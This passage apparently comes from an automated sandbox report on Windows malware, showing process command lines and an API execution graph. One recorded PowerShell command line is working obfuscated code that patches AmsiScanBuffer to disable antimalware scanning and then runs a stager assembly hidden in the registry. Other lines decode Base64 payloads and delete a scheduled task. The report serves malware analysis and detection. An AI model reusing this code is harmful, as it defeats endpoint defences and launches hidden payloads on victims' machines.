'$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:10:23:25
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:31
                                                Start time:10:23:31
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WerFault.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
                                                Imagebase:0x7ff7e77e0000
                                                File size:570'736 bytes
                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:33
                                                Start time:10:23:37
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WerFault.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
                                                Imagebase:0x7ff7e77e0000
                                                File size:570'736 bytes
                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:34
                                                Start time:10:23:37
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                Imagebase:0x7ff7df650000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:10:23:37
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:36
                                                Start time:10:23:40
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                Imagebase:0xd90000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:10:23:40
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:38
                                                Start time:10:23:40
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                Imagebase:0xd90000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:39
                                                Start time:10:23:40
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+[Char](116)+''+'h'+'o'+'d'+''+[Char](115)+'');$yPaGlLGCRnduqK=$CXUkrbOMeMwqm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cAd'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'bl'+[Char](105)+'c'+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gdhANoUlJqediWutYNx=gUdwtNDYXkts @([String])([IntPtr]);$xftKyomHPDnrGsBVhDhGVA=gUdwtNDYXkts @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMpaxAlnYCj=$CXUkrbOMeMwqm.GetMethod('Ge'+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'an'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+'d'+'l'+'l')));$XzRrrWAvhAruOw=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+'L'+'o'+'a'+'d'+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UyziTvRkQswynWCwx=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qNkPxqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$MsjEXyeoZQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,4,[ref]$MsjEXyeoZQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOLdsZyQIYWPbckDA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,0x20,[ref]$MsjEXyeoZQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+'-'+[Char](115)+'t'+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:40
                                                Start time:10:23:40
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:41
                                                Start time:10:23:43
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
                                                Imagebase:0x7ff7d8730000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:42
                                                Start time:10:23:44
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\winlogon.exe
                                                Wow64 process (32bit):false
                                                Commandline:winlogon.exe
                                                Imagebase:0x7ff6fc1b0000
                                                File size:906'240 bytes
                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:43
                                                Start time:10:23:44
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\lsass.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\lsass.exe
                                                Imagebase:0x7ff6d9390000
                                                File size:59'456 bytes
                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:44
                                                Start time:10:23:45
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:45
                                                Start time:10:23:45
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:"dwm.exe"
                                                Imagebase:0x7ff74b010000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:46
                                                Start time:10:23:46
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:47
                                                Start time:10:23:46
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:48
                                                Start time:10:23:47
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:49
                                                Start time:10:23:48
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:50
                                                Start time:10:23:49
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:51
                                                Start time:10:23:49
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:52
                                                Start time:10:23:50
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:53
                                                Start time:10:23:51
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:54
                                                Start time:10:23:51
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:55
                                                Start time:10:23:52
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:56
                                                Start time:10:23:52
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:57
                                                Start time:10:23:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:58
                                                Start time:10:23:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:558
                                                Start time:10:24:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\Conhost.exe
                                                Wow64 process (32bit):
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:
                                                Has administrator privileges:
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:575
                                                Start time:10:24:12
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\Conhost.exe
                                                Wow64 process (32bit):
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:
                                                Has administrator privileges:
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:11.5%
                                                  Total number of Nodes:1956
                                                  Total number of Limit Nodes:6
                                                  execution_graph 16643 2527deeb500 16648 2527deec558 EnterCriticalSection 16643->16648 17559 2527dee2300 17560 2527dee2331 17559->17560 17561 2527dee2412 17560->17561 17562 2527dee2447 17560->17562 17568 2527dee2355 17560->17568 17563 2527dee244c 17562->17563 17564 2527dee24bb 17562->17564 17576 2527dee35c8 GetProcessHeap HeapAlloc 17563->17576 17564->17561 17567 2527dee35c8 11 API calls 17564->17567 17566 2527dee238d StrCmpNIW 17566->17568 17567->17561 17568->17561 17568->17566 17570 2527dee1d30 17568->17570 17571 2527dee1d57 GetProcessHeap HeapAlloc 17570->17571 17572 2527dee1db4 17570->17572 17571->17572 17573 2527dee1d92 17571->17573 17572->17568 17574 2527dee1cfc 2 API calls 17573->17574 17575 2527dee1d9a GetProcessHeap HeapFree 17574->17575 17575->17572 17580 2527dee361b 17576->17580 17577 2527dee36d9 GetProcessHeap HeapFree 17577->17561 17578 2527dee36d4 17578->17577 17579 2527dee3666 StrCmpNIW 17579->17580 17580->17577 17580->17578 17580->17579 17581 2527dee1d30 6 API calls 17580->17581 17581->17580 17083 2527deecbfc 17088 2527deef3a0 17083->17088 17085 2527deecc05 17086 2527deecc22 __vcrt_uninitialize_ptd 17085->17086 17087 2527deecb10 __free_lconv_mon 13 API calls 17085->17087 17087->17086 17089 2527deef3b1 17088->17089 17090 2527deef3b5 17088->17090 17089->17085 17090->17089 17091 2527deeef88 9 API calls 17090->17091 17091->17089 15066 2527dee41f9 15069 2527dee4146 15066->15069 15067 2527dee41b0 15068 2527dee4196 VirtualQuery 15068->15067 15068->15069 15069->15067 15069->15068 15070 2527dee41ca VirtualAlloc 15069->15070 15070->15067 15071 2527dee41fb GetLastError 15070->15071 15071->15069 17092 2527dee5ff9 17093 2527dee6000 VirtualProtect 17092->17093 17094 2527dee6029 GetLastError 17093->17094 17095 2527dee5f10 17093->17095 17094->17095 17615 2527def46f5 17616 2527dee9324 __CxxCallCatchBlock 9 API calls 17615->17616 17617 2527def470d 17616->17617 17618 2527dee9324 __CxxCallCatchBlock 9 API calls 17617->17618 17619 2527def4728 17618->17619 17620 2527dee9324 __CxxCallCatchBlock 9 API calls 17619->17620 17621 2527def473c 17620->17621 17622 2527dee9324 __CxxCallCatchBlock 9 API calls 17621->17622 17623 2527def477e 17622->17623 15196 2527def4611 __scrt_dllmain_exception_filter 16657 2527deec510 16658 2527deec518 16657->16658 16659 2527deec545 16658->16659 16661 2527deec574 16658->16661 16662 2527deec59f 16661->16662 16663 2527deec5a3 16662->16663 16664 2527deec582 DeleteCriticalSection 16662->16664 16663->16659 16664->16662 15197 2527dee820c 15204 2527dee8f34 15197->15204 15203 2527dee8219 15213 2527dee9340 15204->15213 15207 2527deec288 15238 2527deecb10 15207->15238 15210 2527dee8f48 15309 2527dee92dc 15210->15309 15212 2527dee8f51 15212->15203 15214 2527dee935f GetLastError 15213->15214 15215 2527dee8215 15213->15215 15225 2527dee9c8c 15214->15225 15215->15203 15215->15207 15229 2527dee9aac 15225->15229 15230 2527dee9b96 TlsGetValue 15229->15230 15236 2527dee9af0 __vcrt_FlsAlloc 15229->15236 15231 2527dee9b1e LoadLibraryExW 15233 2527dee9b3f GetLastError 15231->15233 15234 2527dee9bbd 15231->15234 15232 2527dee9bdd GetProcAddress 15232->15230 15233->15236 15234->15232 15235 2527dee9bd4 FreeLibrary 15234->15235 15235->15232 15236->15230 15236->15231 15236->15232 15237 2527dee9b61 LoadLibraryExW 15236->15237 15237->15234 15237->15236 15239 2527deecb59 GetLastError 15238->15239 15241 2527deecb2f __free_lconv_mon 15238->15241 15244 2527deecb6c 15239->15244 15240 2527deecb8a SetLastError 15242 2527dee8222 15240->15242 15241->15242 15247 2527deec940 GetLastError 15241->15247 15242->15203 15242->15210 15243 2527deecb87 15243->15240 15244->15240 15244->15243 15245 2527deec940 __free_lconv_mon 11 API calls 15244->15245 15245->15243 15248 2527deec966 15247->15248 15249 2527deec96c SetLastError 15248->15249 15265 2527deed220 15248->15265 15250 2527deec9e5 15249->15250 15250->15242 15253 2527deec9a5 FlsSetValue 15256 2527deec9b1 FlsSetValue 15253->15256 15257 2527deec9c8 15253->15257 15254 2527deec995 FlsSetValue 15272 2527deed2a0 15254->15272 15259 2527deed2a0 __free_lconv_mon 7 API calls 15256->15259 15278 2527deec758 15257->15278 15261 2527deec9c6 SetLastError 15259->15261 15261->15250 15270 2527deed231 __free_lconv_mon 15265->15270 15266 2527deed282 15286 2527deed1f4 15266->15286 15267 2527deed266 HeapAlloc 15268 2527deec987 15267->15268 15267->15270 15268->15253 15268->15254 15270->15266 15270->15267 15283 2527deeb470 15270->15283 15273 2527deec9a3 15272->15273 15274 2527deed2a5 HeapFree 15272->15274 15273->15249 15274->15273 15275 2527deed2c0 GetLastError 15274->15275 15276 2527deed2cd __free_lconv_mon 15275->15276 15277 2527deed1f4 __free_lconv_mon 11 API calls 15276->15277 15277->15273 15295 2527deec630 15278->15295 15289 2527deeb4c0 15283->15289 15287 2527deecb10 __free_lconv_mon 13 API calls 15286->15287 15288 2527deed1fd 15287->15288 15288->15268 15294 2527deec558 EnterCriticalSection 15289->15294 15307 2527deec558 EnterCriticalSection 15295->15307 15310 2527dee92ed 15309->15310 15314 2527dee9302 15309->15314 15311 2527dee9c8c __CxxCallCatchBlock 6 API calls 15310->15311 15312 2527dee92f2 15311->15312 15315 2527dee9cd4 15312->15315 15314->15212 15316 2527dee9aac __vcrt_FlsAlloc 5 API calls 15315->15316 15317 2527dee9d02 15316->15317 15318 2527dee9d0c 15317->15318 15319 2527dee9d14 TlsSetValue 15317->15319 15318->15314 15319->15318 17633 2527dee8f0c 17640 2527dee946c 17633->17640 17639 2527dee8f19 17641 2527dee9474 17640->17641 17643 2527dee94a5 17641->17643 17645 2527dee8f15 17641->17645 17657 2527dee9d28 17641->17657 17644 2527dee94b4 __vcrt_uninitialize_locks DeleteCriticalSection 17643->17644 17644->17645 17645->17639 17646 2527dee9400 17645->17646 17662 2527dee9bfc 17646->17662 17658 2527dee9aac __vcrt_FlsAlloc 5 API calls 17657->17658 17659 2527dee9d5e 17658->17659 17660 2527dee9d68 17659->17660 17661 2527dee9d73 InitializeCriticalSectionAndSpinCount 17659->17661 17660->17641 17661->17660 17663 2527dee9aac __vcrt_FlsAlloc 5 API calls 17662->17663 17664 2527dee9c21 TlsAlloc 17663->17664 17689 2527def06e0 17690 2527def06f9 17689->17690 17691 2527def06e9 17689->17691 17692 2527deed1f4 __free_lconv_mon 13 API calls 17691->17692 17693 2527def06ee 17692->17693 17694 2527deed04c _invalid_parameter_noinfo 38 API calls 17693->17694 17694->17690 15326 2527dee25dc 15327 2527dee265a 15326->15327 15328 2527dee26bf GetFileType 15327->15328 15335 2527dee2777 15327->15335 15329 2527dee26e1 15328->15329 15330 2527dee26cd StrCpyW 15328->15330 15337 2527dee1ad4 GetFinalPathNameByHandleW 15329->15337 15333 2527dee26ee 15330->15333 15333->15335 15342 2527dee3f88 15333->15342 15345 2527dee3708 StrCmpIW 15333->15345 15349 2527dee1dd4 15333->15349 